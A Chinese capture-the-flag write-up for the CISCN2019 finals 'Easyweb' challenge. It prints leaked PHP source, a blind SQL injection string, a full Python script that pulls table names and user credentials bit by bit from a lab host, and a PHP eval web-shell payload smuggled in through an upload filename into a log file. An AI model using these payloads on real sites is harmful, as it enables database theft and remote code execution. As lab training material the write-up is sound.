CISCN2019 总决赛 Day2 Web1Easyweb

扫后台找到robots.txt

提示了些信息 DIsallow*.php.bak

访问image.php.bak

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

测试:

?id=\0&path=or if(length(database())>1,3,1) %23访问成功 又是得盲注了

151.PNG

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
import time
import requests
import sys
import string
import logging


# LOG_FORMAT = "%(lineno)d - %(asctime)s - %(levelname)s - %(message)s"

# logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)

target="http://994977fa-91b0-48fe-92c8-1e029285d13a.node4.buuoj.cn/image.php?id=\\0'&path=or "
#库名
dataStr="(database())"
#表名
#dataStr="(select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database())"
#列名
#dataStr="(select(group_concat(column_name))from(information_schema.columns)where(table_name)=0x7573657273)"
#数据
#dataStr="(select(group_concat(username,password))from(users))"
def binaryTest(i,cu,comparer):
    payloads='ascii(substr({},{},1)){comparer}{}%23'
    s=requests.get(target+payloads.format(dataStr,i,cu,comparer=comparer))
    if 'JFIF' in s.text:
        return True
    else:
        return False


def searchFriends_sqli(i):
    l = 0
    r = 255
    while (l <= r):
        cu = (l + r) // 2
        if (binaryTest(i, cu, "<")):
            r = cu - 1
        elif (binaryTest(i, cu, ">")):
            l = cu + 1
        elif (cu == 0):
            return None
        else:
            return chr(cu)


def main():
    print("start")
    finres=""
    i=1
    while (True):
        extracted_char = searchFriends_sqli(i)
        if (extracted_char == None):
            break
        finres += extracted_char
        i += 1
        print("(+) 当前结果:"+finres)
    print("(+) 运行完成,结果为:", finres)

if __name__=="__main__":
    main()

别的大佬的脚本

这边爆出表名users后的将其转为十六进制 因为过滤了单引号双引号0x7573657273

152.PNG

153.PNG

爆完数据登入
传文件 可以传入phtml

但是提示将文件名写入日志文件中

155.PNG

那就可以

1
filename="<?= @eval($_POST['hack']); ?>"

用短标签绕过

156.PNG

蚁剑连接一下就好了

154.PNG